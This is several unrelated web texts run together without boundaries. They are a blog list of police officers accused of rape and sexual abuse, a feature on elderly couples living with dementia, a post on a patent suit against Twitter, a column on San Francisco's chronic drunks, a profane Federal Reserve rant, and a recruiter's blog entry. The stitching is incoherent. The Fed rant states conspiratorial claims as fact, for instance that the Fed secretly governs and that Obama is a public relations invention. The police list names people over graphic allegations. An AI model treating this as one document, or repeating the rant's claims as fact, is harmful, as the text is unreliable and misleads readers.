Gerek threatened to murder their children if his wife left him or if she called police .
When she told government prosecutors that she was too afraid to testify against Officer Timothy Gerek Jr. in court — while he was violating the protection order that required him to stay away from her and her children — the prosecutors decided to offer Gerek a plea - bargain that dropped the rape charge and reduced the domestic violence charge to misdemeanor assault .
When Gerek accepted the bargain and plead guilty , this rapist and wife - beater was sentenced to a year of probation and ordered to pay a $ 500 fine to the county government .
Some years later , Gerek tried to pull strings to try to get prior criminal charges expunged from his record , including getting the record of his misdemeanor assault charge from the beating and rape in 2002 sealed .
If he had succeeded in getting the record sealed , it would have eliminated the public record of his agreement never to work in law enforcement again .
27 . Officer Stanley Marrero . Lorain Police Department .
Lorraine , Ohio .
Another cop working for the Lorain city government ’s police force , who was frequenty mentioned in those complaints was Officer Stanley Marrero , was accused of raping a woman while responding to a call at her home in 1993 .
Then he was accused of using a routine traffic stop in 1995 to hit on the woman he was detaining , ask her personal questions and get her phone number , which he later called at 4:00 in the morning .
The Incident was Internally Investigated and Marrero was exonerated .
In 2003 , another woman filed a complaint that Officer Stanley Marrero had followed her while on duty and in uniform and asked her personal questions .
The Incident was Internally Investigated and he was ordered to leave her alone , with no further consequences .
In 2000 , when Officer Stanley Marrero was sent out to a woman ’s house on a domestic violence call in 2000 , allegedly to help keep her safe from an abusive husband , he took the opportunity to use his legal powers to order her husband to leave , then , once he had her alone , forced the traumatized domestic violence victim to have sex with him .
When the woman filed a complaint with the police department , they Internally Investigated , pressed no charges against Officer Stanley Marrero , and gave him a 3 day suspension .
In 2006 , Officer Stanley Marrero was finally arrested and sentenced to 60 days in the county jail for public indecency , dereliction of duty , and intimidation of a witness after forcing sex on two different women while on duty and after forced his way into an acquaintance ’s neighbor ’s house under cover of an investigation , exposed himself to her and demanded oral sex from her , and then , after she refused and unleashed her dog to defend herself , threatened her with retaliation and arrest if she told anyone what happened .
Officer Stanley Marrero is only now , finally , being investigated for the rape in 1993 .
When he was finally convicted in 2006 , after years of acting with impunity as a stalker and serial rapist under color of legal authority , the judge in the case , Edward Zaleski , said The evidence appears overwhelming .
Mr. Marrero , police scare the hell out of me .
They sure scare the hell out of most people .
28 . Deputy William Hatfield .
Pike County Sheriff ’s Office .
Pike County , Kentucky .
In Kentucky , William Bill Hatfield , a volunteer sheriff ’s deputy working for the Pike County government ’s sheriff ’s office in return for gas money , a gun , and power , used that power to sexually assault a woman he had forced to the side of the road and detained for a routine stop .
29 . Officer Dewayne Curtis Hart .
Pittsburgh Police Department .
Pittsburgh , Pennsylvania .
Back in 2007 , Dewayne Curtis Hart , a cop working for the Pittsburgh city government ’s police force , went out on a burglary call at a woman ’s house ; a few minutes after he left , he came back , told the burglary victim that there was a warrant for her arrest on a robbery charge , threatened to arrest her , and then used the threat to forcibly undress and fondle her , then force her to fondle him .
The story is in the news again because Officer Dewayne Curtis Hart ’s trial on the sexual assault charges was recently delayed until October ; meanwhile , while the charges are still pending , the Pittsburgh city government ’s personnel refuses to say whether or not this accused rapist cop is still on the job .
30 . Trooper Carlos Torres . Washington State Patrol .
Back in June 2005 , a Washington State Trooper named Carlos Torres forced a woman to pull over on the highway on suspicion of drunk driving , placed her under arrest and forced her into his patrol car to give her a blood test , then drove her to a weigh station to be picked up by her fiance .
( She wanted her fiance to pick her up at the jail ; Trooper Carlos Torres refused , and forced her to go with him to the weigh station . )
The whole time he asked her invasive personal questions about oral and anal sex ; then , while keeping her locked in the back of his patrol car at the weigh station , he demanded her to undress and forcibly fondled her through the divider in his patrol car .
The story is in the news again because Trooper Carlos Torres recently made an unsuccessful attempt to get a custodial sexual misconduct charge thrown out on the grounds that his victim was not in fact being detained by him while she was locked in the backseat of his patrol car with no ability to open the doors or windows and no way to get out without his permission , after he had already forced her to get into the car against her will .
31 . Deputy Police Chief Jody Beaudry , Mulberry Police Department , Mulberry Florida .
Back in 2004 , a 40 - year - old man Jody Beaudry , a cop working for the Mulberry , Florida city government ’s police force , used his position as a police officer to threaten to revoke a 16 - year - old girl ’s probation , and used this threat of arrest and jail to force her to have sex with him .
By the time he was arrested in 2008 , he had been promoted to Deputy Police Chief .
The story ’s in the news because he just recently plead guilty to unlawful sexual activity with a minor , a crime which may put him in jail for up to 7 years in prison .
( The crime that he actually committed , by using the threat of retaliation and his powers of arrest to commit sexual battery , is , under Florida state law , a first - degree felony punishable by up to 30 years in prison . )
32 . Patrol Deputy Michael Jared Boulware , Sumter County Sheriff ’s Office , Wedgefield , South Carolina .
26 - year - old Deputy Michael Jared Boulware is out on bond awaiting trial for sexually assaulting a 14 year old girl .
According to the government prosecutor , who asked the judge to deny bail , the victim is extremely upset and worried he will locate her .
According to his defense attorney , the fact that Boulware is a former cop is supposed to provide a reason for lowering bond .
Actually , I think it ’s a reason for thinking that he ’s potentially more dangerous to the victim .
33 . Kevin Yuhas , Streator Police Department , Streator , Illinois .
Earlier this month , Kevin Yuhas , a 42 - year - old 911 dispatcher working for the Streator , Illinois city government ’s police force , was arrested in Wisconsin for inviting a 14 - year - old boy into his home , plying the boy with 10 to 15 shots of hard liquor , and then raping him .
Yuhas admits that he invited the boy over and got him drunk , but ca n’t remember anything that came after .
34 . Officer James Stackhouse .
Nashville Metro Police Department .
Nashville , Tennessee .
Earlier this month , Officer James Stackhouse , a cop working for the Nashville local government ’s Metro Police Department , was forced out of his job as a result of an ongoing investigation into allegations that he had an inappropriate sexual relationship with a 12 - year - old girl in Clay County .
35 . Donald Silcott .
Jacksonville Sheriff ’s Office .
Jacksonville , Florida .
Earlier this month , veteran police officer Donald Silcott , an evidence technician working for the county government ’s Sheriff ’s office was arrested for sexually assaulting a teenage girl in his home .
The victim was taken to the hospital after she was found crying on a doorstep holding a photo of Silcott and a note with his name , address , and the date of the incident .
The girl , apparently distraught and terrified , hid in the bushes and asked the woman who found her to dial 911 so she could be taken to the hospital .
According to the arrest report , they performed a rape kit and recovered DNA evidence at the hospital .
36 . Officer Aaron L. Jones .
Harrington Police Department , Harrington , Delaware .
Aaron L. Jones , a 40 - year - old cop working for the Harrington city government ’s police force , was arrested earlier this month for having sex with a minor female who was staying in his home .
Jones was released on a $ 2,500 unsecured bond and the government police have put him on a paid vacation from his job while they investigate the charges .
37 . Officer Todd Spikes .
Florala , Alabama Police Department .
Florala , Alabama .
After driving to Flagler Beach for what he thought was a meet - up for sex with a 13 year old girl he met on the Internet , Officer Todd Spikes , a cop working for the Florala , Alabama city government ’s police force was exposed as a sexual predator on national television and arrested in December 2006 .
The case is in the news again because government prosecutors recently offered their former colleague Todd Spikes a plea bargain which would give him probation with no prison time .
Spikes turned the offer down , because it would have required him to register as a sex offender .
38 . Officer Todd Lengsfield , Newnan Police Deartment , Newnan , Georgia .
Earlier this month , Officer Todd Lengsfield , a 34 - year - old cop working for the Newnan , Georgia city government ’s police force , was arrested for having sex with a 15 - year - old girl .
His bosses were tipped off by inappropriate contact with the girl using a government - issued cell phone .
A blogger at eXaminer.com claims that the story is a reason why Parents have to be careful with children and technology .
Actually , it sounds to me like a reason parents and children have to be careful around cops .
39 . Officer Luke Morrison , Henderson Police Department , Henderson , Nevada .
You may remember Officer Luke Morrison of Henderson , Nevada for the time when he shot and killed a distraught Albanian ice - cream truck driver after she had already been knocked to the ground with a taser .
Before lighting up Deshira Selimaj for the Henderson city government ’s police force , Officer Luke Morrison was a former soldier who fought in the United States government ’s army ’s war and occupation in Iraq .
Anyway , it turns out that when Officer Luke Morrison is not busy gunning down middle - aged women with no legal consequences , he also enjoys sleeping with 15 year old girls .
Commenter lv2gen on the Las Vegas Sun website wants us to know that A few bad apples do n’t mean every cop is dirty .
40 . Officer Nathan Amosa .
Hurricane Police Department , Hurricane , Utah .
Last year , Officer Nathan Amosa , a cop working for the Hurricane , Utah city government ’s police force , responded to a call from a distraught mother and went to her house , allegedly to help her find her missing child , who had wandered away .
Instead , he threatened to cite her for child neglect and have the government take her child away from her unless she would have sex with him .
The victim says that she felt she had to do what he demanded because of the threat against her child and because Officer Nathan Amosa was in uniform and had a gun .
After raping her , Officer Nathan Amosa later went on to intimidate his victim at a local grocery store .
This rape is dignified by the news media as an on - duty sex episode ; the story is in the news again because the government prosecutor and government judge agreed to let Officer Nathan Amosa — who had been charged with forcible sodomy and two counts of forcible sex abuse — plead no -contest to a charge of custodial sexual relations , , for which he will spend 60 days in county jail and get three years ’ probation .
According to the government prosecutor , this confessed rapist will get only 60 days in jail ( and , because custodial sexual relations convictions do n’t require it , will not be required to register as a sex offender ) because he is a cop and ( therefore ? ) because he believes that it would have been difficult to prove the victim did not consent .
During sentencing , the government prosecutor told the government judge that If this was anyone other than a police officer , we would not even be here .
No doubt .
Over at the Desert News website , a commenter going by Cops wants us to know that There ’s a lot of great cops out there and just a few high - profile incidents like this that can give them all a bad name .
41 . Officer Anthony Rollins .
Anchorage Police Department , Anchorage , Alaska .
Last month in Alaska , Officer Anthony Rollins , a 13 year veteran of the Anchorage city government ’s police force was arrested on 10 charges of sexual assault for raping at least 6 women that he encountered while on patrol and lured into his police car , from March 2006 to April 2009 .
This serial rapist , who repeatedly used the power of his uniform and his legal privileges to force sex on unwilling women ( including at least one rape committed at a police substation ) was finally arrested after a local anti-rape group approached the police department in April , and during the investigation five more women came forward to report sexual assaults .
The investigation is ongoing and more survivors may yet come forward .
Meanwhile , although unwilling Anchorage taxpayers were forced to pay Anthony Rollins over $ 142,892 last year for his unrequested services as a patrol officer , and were forced to pay him $ 78,668 this year prior to his arrest , and have been forced to pay him and his wife ( who also works for the city government ’s police department ) over $ 1,100,000 over the last five years , this millionaire government cop has been declared indigent by the government judge handling his trial , so that innocent Alaska taxpayers , including his six victims will be forced to pay for a government - appointed defense lawyer for his trial .
Rollins ’s former boss , Anchorage boss cop Rob Heun , issued an angry statement to the press in which he called Rollins ’s career as a serial rapist aberrant and detestable .
Well , I certainly agree with him about the latter .
42 . Officer Kenneth Moreno and Officer Franklin Mata .
New York Police Department .
New York , New York .
Last December in New York , a pair of cops working for the city government ’s police force responded to a 911 call from a cab driver about a woman he had driven home who had gotten sick from being extremely drunk .
They showed up around 1:00 am , allegedly to help her get home safely ; instead they decided to make up a cover about their whereabouts , go back to the apartment , and rape her while she was half - conscious , violently sick , and physically helpless .
( Apartment security cameras show them returning to the apartment ; Officer Kenneth Moreno was recorded on the phone admitting to the victim that he had sex with her . )
NYPD boss cop Ray Kelly — who knew about the case for months before any charges were filed or any allegations made public , and who did n’t even suspend the cops accused until the charges hit the newsmedia — claims that The allegations are so egregious here that its imperative that I speak out .
This is a shocking aberration in stark contrast to the good work that the members of the New York City Police Department do every day .
Yeah , a huge fucking aberration .
Just like all the others .
Back in Anchorage , when a reporter asked him how serial - rapist Anthony Rollins could get away with attacking at least six women while he was out on patrol over a period of three years before the police began an investigation , boss cop Rob Heun responded that there was nothing other police could have done about Rollins because
No policy or procedure is going to preclude anybody who wants to break it to do just that …
This is a matter of behavior — just like no law will preclude anyone from breaking the law .
Of course it is true that any written law or policy can be broken , but the problem here is not just the laws that are being broken ; it ’s the laws that are being followed , government laws which create an institutional environment of entitled privilege , and which give any male cop who happens to be a sexual predator an arsenal of legally - sanctioned weapons and immense unaccountable power over any woman or man who he wants to place under his power while out on patrol .
As I said in December 2007 about a case involving several male patrol cops in San Antonio :
What as at stake here has a lot to do with the individual crimes of three cops , and it ’s good to know that the police department is taking that very seriously .
But while excoriating these three cops for their personal wickedness , this kind of approach also marginalizes and dismisses any attempt at a serious discussion of the institutional context that made these crimes possible — the fact that each of these three men worked out of the same office on the same shift , the way that policing is organized , the internal culture of their own office and of the police department as a whole , and the way that the so - called criminal justice system gives cops immense power over , and minimal accountability towards , the people that they are professedly trying to protect .
It strains belief to claim that when a rape gang is being run out of one shift at a single police station , there ’s not something deeply and systematically wrong with that station .
If it were n’t for the routine power of well - armed cops in uniform , it would have been much harder for Victor Gonzales , Anthony Munoz , or Raymond Ramos to force their victims into their custody or to credibly threaten them in order to extort sex .
…
And if it were n’t for the way in which they can all too often rely on buddies in the precinct or elsewhere in the force to back them up , no matter how egregiously violent they may be , it would have been much harder for any of them to believe that they were entitled to , or could get away with , sexually torturing women while on patrol , while in full uniform , using their coercive power as cops .
A serious effort to respond to these crimes does n’t just require individual blame or personal accountability ….
It also requires a demand for fundamental institutional and legal reform .
If police serve a valuable social function , then they can serve it without paramilitary forms of organization , without special legal privileges to order peaceful people around and force innocent people into custody , and without government entitlements to use all kinds of violence without any accountability to their victims .
What we have now is not civil policing , but rather a bunch of heavily armed , violently macho , institutionally privileged gangsters in blue .
— GT 2007 - 12 - 21 : Rapists on patrol
See also :
More than 60 years after they met and fell in love , John and Alice Blanding are still an item .
As a pontoon boat loaded with other elderly couples slowly circled a small Ottawa County lake below , John leaned over his wife to let her know with a kiss .
Given her advanced state of dementia , it was a declaration of faith that she got the message .
View larger photos
" Every once in a while she will grab my hand and hold it up to her lips , " said Blanding , 80 , of Alice , 78 .
" We still have that love connection . "
So it is with five other couples on an outing organized by Grand Rapids - based Clark Retirement Community .
One way or another , each is touched by some form of dementia or Alzheimer 's disease .
And as the U.S. population ages , experts expect this affliction to touch more and more families nationwide .
BY THE NUMBERS
• Alzheimer 's disease affects more than 5 million Americans .
• The number of Americans with Alzheimer 's could more than triple to 16 million by mid-century .
• An estimated one in eight persons aged 65 and older has Alzheimer 's disease .
• Research from the National Institute on Aging indicates the prevalence of Alzheimer 's disease doubles every five years beyond age 65 .
• As our population ages , the disease strikes a greater percentage of Americans .
The number of people age 65 and older will more than double between 2000 and 2030 to 70.3 million .
Those 85 and older will rise two - fold , to 8.9 million , according to the U.S. Census Bureau .
• Across the globe , those older than 80 are projected to increase 233 percent between 2008 and 2040 , compared to 33 percent in population of all ages .
• In Michigan , the percentage of the population age 65 and older is projected to rise from 12.3 percent in 2000 to 19.5 percent in 2030 .
In real numbers , that means an increase of more than 850,000 people age 65 and older .
SOURCE : Alzheimer 's Foundation of America and U.S. Census Bureau
According to the Alzheimer 's Foundation of America , Alzheimer 's affects more than 5 million Americans .
That number is expected to more than triple to 16 million by 2050 for a disease that represents 50 to 70 percent of dementia cases .
" When we do an orientation for 10 people at Clark , three or four have somebody in their family who have the disease , " said Chris Simons , dementia services coordinator at Clark .
Just - released figures from the U.S. Census Bureau forecast a similar trend across the globe as populations age .
According to the bureau , the " oldest old , " those over 80 , is projected to rise 233 percent between 2008 and 2040 , compared to 33 percent in population of all ages .
Dr. Kevin Foley , director of Saint Mary 's Health Care 's Alzheimer 's Disease and Memory Disorders Program , said medical research is far from cracking the mystery of this disease .
" It 's going to be a marathon , " he said .
" I 'm very concerned about the future , about our capacity to care for everybody who is going to get dementia . "
Foley noted there is no cure or sure knowledge of the cause of Alzheimer's .
Medications have limited success in delaying its progression .
As a consequence , it can take a crushing toll on those closest to the patient as spouse or children witness the slow disappearance of a loved one .
At Clark , Simons understands all this .
But she decided about two years ago it need not spell the end of romance .
And so , once a month these couples go on a " date " so they can keep that flame alive .
They go to movies .
Out to eat .
They travel to Fifth Third Park for a ball game .
Just three or four hours .
But something to look forward to .
A chance to sit and hold hands , maybe smooch a little , share the wordless bond they spent a lifetime constructing .
Simons believes these outings also have considerable therapeutic value , increasing self - esteem and giving couples a chance to be , well , couples .
On this sun-splashed day , they are bound by bus for Indian Trails Camp in eastern Ottawa County for a picnic lunch and boat ride .
Dave and Kathy Crawford sit a couple rows back , bantering about who will retain what about this day .
" You wo n't even remember this day tonight , " said Dave , 81 , a retired minister and administrator for the United Methodist Church .
Kathy , 79 , laughed at his assessment , telling a guest : " You are talking to a man who uses a little black book to tell him what to do every day . "
" That 's true , " Dave said .
But of the two , Kathy Crawford 's dementia has progressed furthest .
Her short - term memory is spotty at best , while Dave can still navigate and plan his way through a day .
She lives in an assisted - living unit for the memory - impaired at Clark while he maintains an independent apartment on the Clark campus .
As the bus rumbled along , Dave conceded : " I get depressed over Kathy 's circumstances , when she can't remember things . "
Sitting up front , Don and Ardis Merrill , both 88 , have 64 years of marriage between them .
They have five children , 15 grandchildren and seven great - grandchildren .
Don recalled their first date , in 1940 , at a football homecoming game at what was then Central Michigan College in Mount Pleasant .
" We talked constantly , " Don recalled .
Don is beginning to struggle with short - term memory .
Ardis has Parkinson 's disease along with dementia .
She often struggles to communicate .
Looking over at Ardis , Don said : " She knows everything we are saying right now .
She knows everything . "
Later that day , after a lunch of turkey sandwiches , chips and soda , couples took turns on lazy pontoon rides around the lake .
Because Alice could not easily get aboard , John stayed behind with her on a landing overlooking the lake .
He leaned over and planted a kiss on the top of her head .
Dave and Kathy Crawford sat on the boat holding hands , Kathy sipping Cherry Coke through a straw .
They joked about the tiny dimensions of the lake .
Waiting to board the bus for home , Don leaned over Ardis in her wheelchair and whispered a few words .
She smiled .
Like others on this outing , he has learned to squeeze all he can from the diminishing days left to him and his wife .
" We had a great time .
What 's not to like ? "
John and Alice Blanding moved into Clark in February , after John persuaded officials there he would provide primary responsibility for her care .
She had deteriorated for years , to the point where he had trouble looking after her in their Lowell home .
John dedicates his days to Alice .
He helps her to the bathroom , fixes her hair , spoon - feeds her meals .
He will do so as long as he is able .
He talked fondly of the many decades she played piano and organ at Snow United Methodist Church near Lowell .
He looked down at Alice .
It was hard to know how much she was taking in .
But all in all , John said , he could n't complain .
" It is a good day , " he said .
E -mail the author of this story : localnews@grpress.com
Twitter is being sued for patent infringement by TechRadium , a company that provides emergency alert messaging , broadcast and response systems to school districts , municipal governments , the U.S. military and other organizations .
Tech Radium ’s system provides a platform where one message can be sent to multiple recipients on a variety of different devices , like cellphones , regular phones , fax machines or email .
The reason for the suit is because several of TechRadium ’s customers have said that they may switch over to using Twitter to deliver their alerts , since it does basically the same thing but for free .
From MacWorld :
“ The lawsuit , filed on Tuesday in the U.S. District Court for the Southern District of Texas , Houston Division , seeks among other things unspecified damages , recovery of attorneys ’ fees and a permanent injunction against Twitter .
The patents Twitter is allegedly infringing are patent number 7,130,389 , granted in October 2006 for a “ digital notification and response system ” ; patent number 7,496,183 , granted in February 2009 for a “ method for providing digital notification ” ; and patent number 7,519,165 , granted in April 2009 for a “ method for providing digital notification and receiving responses . ”
This is n’t a simple case of paying damages and moving on .
Essentially TechRadium is trying to shut them down with a permanent injunction against using it ’s core technology .
The biggest problem , though , is that it looks as if TechRadium has an airtight case against twitter .
So how do you think Twitter will weasel it ’s way out of this one ?
Chronic drunks ' treatment costs S.F. big bucks
San Francisco has paid at least $ 150,000 for Kenny Walters in the past year .
He is n't employed , has an arrest record as long as his hair , and can often be found passed out in a doorway on Haight Street .
Kenny Walters ' job is to get drunk .
He 's certainly not alone .
" Chronic inebriants " are a grim and disturbing fact of life in San Francisco .
They also cost the city millions .
The frustration is that the public service network - police , fire and medical professionals - does n't seem to make a dent when it comes to people like Walters .
There are suggestions , like a pilot program for high - impact users at the Department of Public Health , or the Community Justice Center to target frequent users , but nothing seems to get traction .
A five - year study found that 225 high ambulance users cost the city an average of $ 13 million annually , said Maria X. Martinez , a deputy director at the Department of Public Health .
' A lot of money '
That may be low .
Martinez 's study calculated an ambulance pickup at a cost of $ 725 in 2007 ; for 2009 - 10 the cost is $ 1,458 .
Image 1 of / 3 Caption Close Chronic drunks ' treatment costs S.F. big bucks 1 / 3 Back to Gallery
" No matter how you calculate it , " Martinez said , " it is a lot of money . "
There should be a way to address this .
Martinez 's study also found that fewer than 300 individuals account for 80 percent of the ambulance runs for alcohol treatment .
That kind of focus is exactly why the Community Justice Center was created .
Apparently , in screwy City Hall logic , saving a few hundred thousand dollars by dumping the Community Justice Center trumps the loss of millions .
Recently Walters , who came from Arizona a year and a half ago , was curled up in the fetal position on the sidewalk near Masonic and Haight .
Tourists with a camera walked past him ; some peered down to see if he was breathing .
" Basically he comes out here and drinks himself to this point every day , " police Officer John Andrews said .
" It 's like the movie ' Leaving Las Vegas , ' " in which where Nicolas Cage 's character goes to Las Vegas to drink himself to death .
Happy camper
Walters , who was decked out in a red , long - sleeve Spider - Man shirt , is n't homeless or broke .
The 41 - year - old happily shared his story with me .
He sat up , pushed his blond bangs off his face , and blinked his striking blue eyes until his surroundings came into focus .
" I do get caught for drinking out here every day , " he said affably .
" I wish I had another beer right now . "
He said he gets $ 953 a month in Supplemental Security Income for disabled and aged citizens and pays $ 650 a month for a hotel room in the Tenderloin under the city 's Care Not Cash program .
With free meals available from local charities , that leaves $ 300 a month for booze .
Walters says he does n't do hard drugs , just pot .
He just drinks , usually " 40 ouncers , " big , cheap bottles of beer .
" He probably gets picked up two or three times a week , " said Andrews , who pointed to two plastic hospital bands Walters had on his wrist from previous visits .
" I 've seen him with four or five hospital bands at a time . "
Too drunk to walk
Walters is usually too intoxicated to walk , which makes him ineligible for a sobering center .
But regardless of where he goes , Walter 's is n't bothered about the expense .
" Does n't cost me a thing , " he said cheerfully .
But the city is on the hook .
It is n't just the money .
Each pickup means an ambulance and a fire engine are out of service for other calls .
" One guy had 49 pickups in a month , " Martinez said .
Walters says he has " probably gotten 100 tickets in a year and a half , but I just do n't go to court .
...
My tickets just do n't seem to show up . "
Actually , they are either dismissed or a warrant is issued .
But because he ignores those , too , nothing happens .
Andrews says he continues to cite Walters , but " he 's in such bad health there is n't much we can do . "
It is a sad story on every level .
While it is infuriating to hear that " frequent fliers " game the system to get free care , everyone knows how this story ends .
" These guys show up in somewhat good health and then deteriorate , " said Andrews .
" Eventually we find them under one of the bushes in Golden Gate Park - dead . "
We 're making this way , too complicated .
It 's simple really .
The Fed has only one tool at its disposal ; to create more money .
Typically , the way the Fed adds to the money supply is by lowering interest rates .
When the Fed lowers rates below the rate of inflation ; they 're basically selling dollars for under a buck .
That 's a good deal , so , naturally , speculators jump on it and trigger a credit expansion .
What follows is a frenzy of market activity that ends in a housing , credit , tech or equity bubble .
Eventually , the bubble bursts and the economy goes into a tailspin .
Then , after a period of digging - out , the process resumes again .
Wash , rinse , repeat .
It 's always the same .
The moral is : Cheap money creates bubbles ; and bubbles move wealth from workers to rich motherf ** kers .
It 's as simple as that .
That 's why the wealth gap is wider now than anytime since the Gilded Age .
The rich own everything .
The Federal Reserve is the policy arm of the big banks and brokerage houses .
Period .
Ostensibly , its mandate is to maintain " price stability and full employment " .
Right .
Anyone notice how many jobs the Fed has created lately ?
How about the dollar ?
Is it really supposed to zig - zag like it has been for the last decade ?
The central task of the Fed is to shift wealth from one class to another .
And it succeeds at that task admirably .
The Fed 's " mandate " is public relations claptrap .
Bernanke has n't lifted a finger for homeowners , consumers or ordinary working stiffs .
" Yer on yer own .
Just do n't expect a handout .
That 's socialism ! "
All the doe is flowing upwards ... according to plan .
The Fed is a social engineering agency designed to serve as the de facto government behind the smokescreen of democratic institutions .
Did you really think a black , two year senator with no background in foreign policy or economics was calling the shots ?
Puh - leeese !
Obama is a public relations invention who 's used to cut ribbons , console the unemployed , and convince Americans they live in a " post racial " society .
Right .
( Just take a look at the footage from Katrina again ) The Fed has complete control over monetary policy and , thus , the country 's economic future .
Bernanke does n't even pretend to defer to Congress anymore .
Why bother ?
After Lehman caved in , Bernanke invoked the " unusual and exigent " clause in the Fed 's charter and declared himself czar .
Now he has absolute power over the nation 's purse - strings .
The $ 13 trillion the Fed has committed to the financial system since the beginning of the crisis -- via loans and outright purchases of mortgage - backed garbage and US sovereign debt -- was never authorized by Congress .
In fact , the Fed stubbornly refuses to even identify which institutions got the " loans " , how much the loans were worth , what kind of collateral was accepted for the loans , or when the loans have to be repaid .
In truth , the loans are not loans at all , but gifts to the industry to keep asset prices artificially high so that the entire financial system does not come crashing down .
Check this out : " In an analysis written by economist Gary Gorton for the Federal Reserve Bank of Atlanta 's 2009 Financial Markets Conference titled , " Slapped in the Face by the Invisible Hand ; Banking and the Panic of 2007 " , the author shows that mortgage - related securities ballooned from $ 492.6 billion in 1996 to $ 3,071.1 in 2003 , while asset backed securities ( ABS ) jumped from $ 168.4 billion in 1996 to $ 1,253.1 in 2006 .
All told , more than $ 20 trillion in securitized debt was sold between 1997 to 2007 . " $ 20 trillion !
How much of that feces paper -- which is worth just pennies on the dollar -- is sitting on the balance sheets of banks and other financial institutions just waiting to blow up as soon as the Fed asks for its money back ?
And the Fed will never get its money back because the prices of complex securities and derivatives will never regain their pre-crisis values .
Why ?
Because these derivatives are linked to underlying collateral ( mortgages ) which have already declined 33 % from their peak and are headed lower still .
Also , these toxic assets were sold as risk - free ( many of them were rated triple A ) and have now been exposed as extremely risky or fraudulent .
Because these assets were heaped together in bundles to strip out their interest rates , they cannot be easily separated which means that they are worth considerably less than the 33 % that has been lost on the underlying collateral ( mortgages )
The securitization markets are not expected to rebound for a decade or more , which means that the Fed will have to find other more - creative way to goose the credit system to avoid a downward spiral .
But how ?
Zero percent interest rates have n't worked because qualified borrowers are cutting spending and saving their disposable income , while people who need to borrow , no longer meet the banks ' tougher lending standards .
Bank credit is shrinking even though excess bank reserves are nearly $ 900 billion .
When banks stop lending , the economy contracts , business activity slows , unemployment soars and growth sputters .
Presently , the economy is still contracting , but at a slower pace than before .
" Less bad " is the new " good " .
All the recession indicators are still blinking red-- income , employment , sales , and production -- all down big !
But it does n't matter because it 's a " Green Shoots " rally ; plenty of cheap liquidity for the markets and a freeway off - ramp ( for sleeping ) for the unemployed .
The Fed 's lending facilities are designed to pump liquidity into the system and inflate another bubble by generating more debt .
Unfortunately , most people accept Bernanke 's feeble defense of these corporate - welfare programs and fail to see their real purpose .
An example may help to explain how they really work :
Say you bought a house at the peak of the bubble in 2005 and paid $ 500,000 .
Then prices dropped 40 % ( as they have in Calif ) and your house is now worth $ 300,000 .
If you only put 5 % down , ( $ 25,000 ) then you are underwater by $ 175,000 .
Which means that you own more on the mortgage than your house is currently worth .
( This is essentially what has happened to the entire financial system .
The equity has vaporized , so institutions are using dodgy accounting tricks instead of reporting their real losses . )
So Bernanke comes along and gives you $ 175,000 no interest , rotating loan to you so that no one knows that you are really busted and you can continue spending just as you had before .
Not bad , eh ?
This is what the lending facilities are all about .
It is a charade to conceal the fact that a large portion of the nation 's financial institutions are insolvent and propped up by state largess .
But there 's more , too .
Now that Bernanke has given you $ 175,000 no interest , rotating loan ; you expect that eventually he will ask for his money back .
Right ?
So your only hope of saving your home , in the long run , is to engage in risky behavior , like dabbling the stock market .
It 's like playing roulette , except you have nothing to lose since you are underwater anyway .
This is exactly what the financial institutions are doing with the Fed 's loans .
They 're betting on equities and hoping they can avoid the Grim Reaper .
Here 's how former hedge fund manager Andy Kessler summed it up last week in the Wall Street Journal : " By buying U.S. Treasuries and mortgages to increase the monetary base by $ 1 trillion , Fed Chairman Ben Bernanke did n't put money directly into the stock market but he did n't have to .
With nowhere else to go , except maybe commodities , inflows into the stock market have been on a tear .
Stock and bond funds saw net inflows of close to $ 150 billion since January .
The dollars he cranked out did n't go into the hard economy , but instead into tradable assets .
In other words , Ben Bernanke has been the market . "
( Andy Kessler , " The Bernanke Market " Wall Street Journal )
Only a small portion of the money that has gone into the stock market in the last 6 months ( since the March lows ) has come from money markets .
The fed 's loans are being laundered into stocks via financial institutions that are rolling the dice for their own survival .
The uptick in the markets has helped insolvent banks raise equity in the capital markets so they do n't have to grovel to Congress for another TARP bailout .
Everybody 's elated with Bernanke 's latest bubble except working people who have seen their wages slashed by 4.5 % , their credit lines cut , the home values plunge , and their living standards sink to third world levels .
And the Fed 's spending - spree is not over yet ; not by a long shot .
The next wave of home foreclosures ( already 1.9 million in the first half of 2009 ) is just around the corner -- the Alt - As , option arms , prime loans .
The $ 3.5 trillion commercial real estate market is capsizing .
The under - capitalized banking system will need assistance .
And there will have to be another round of fiscal stimulus for ailing consumers .
Otherwise , foreign holders of US Treasurys will see that the US can no longer provide 25 % of global demand and head for the exits .
Bernanke 's back is against the wall .
The only thing he can do is print more money , shove it though the back door of the stock exchange and keep his fingers crossed .
The rest is up to CNBC and the small army of media cheerleaders .
There is some truth to the theory that Bernanke saved the financial system from a Chernobyl - type meltdown .
But that does n't change the facts .
Accounts must be balanced ; debts must be paid .
The Fed chief has committed $ 13 trillion to maintain the appearance of solvency .
But the system is bankrupt .
The commercial paper market , money markets , trillions of dollars of toxic debt instruments , and myriad shyster investment banks and insurance companies are now backed by the " full faith and credit " of the US Treasury .
The financial system is now a ward of the state .
The " free market " has deteriorated into state capitalism ; a centralized system where all the levers of power are controlled by the Central Bank .
If Bernanke 's Politburo withdraws its loans -- or even if he raises interest rates too soon -- the whole system will collapse .
The economy is now balanced on the rickety scaffolding of the dollar .
As the Obama stimulus wears off , the rot in the economy will become more apparent .
Household red ink is at record highs , so personal consumption will not rebound .
That means US assets and US sovereign debt will become less attractive .
Foreign capital will flee .
The dollar will fall .
The world needs a breather from the US .
And they 'll get it sooner than many think .
MakingOf has an interview up with me in which I talk a bit about my writing process , the challenge of adaptations , and why one ’s career is often as much about the scripts you did n’t write .
I used to be an executive recruiter and I can tell you : the worse a recession is , the more demanding the prospective employers become .
I remember trying to fill high - level software sales positions after the dot com collapse for hiring managers who did n't want " any of those dot com people . "
( Apparently they showed too great an affinity for risk - taking . )
And yet , all the experienced candidates worked for them , so they ended up hiring people who did n't know what they were doing .
So if you 're a good , talented employee and you still have trouble getting a job , please do n't take it personally .
The people making the hiring decisions are often a little nuts , making off - the - wall demands based on their own crazy logic :
With unemployment at 9.4 % and rising , it ’s a buyer ’s market for employers that are hiring .
But many employers are bypassing the jobless to target those still working , reasoning that these survivors are the top performers .
“ If they ’re employed in today ’s economy , they have to be first string , ” says Ryan Ross , a partner with Kaye / Bassman International Corp. , an executive recruiting firm in Dallas .
Mr. Ross says more clients recently have indicated that they would prefer to fill positions with “ passive candidates ” who are working elsewhere and not actively seeking a job .
See , that 's just sales speak .
It may indicate that they 're first string - or it may indicate that their brother - in - law is the department head , or that the person is really , really good at kissing butt .
The whole " passive candidate " thing is something recruiters like to push because that way , we get to bill a lot more hours .
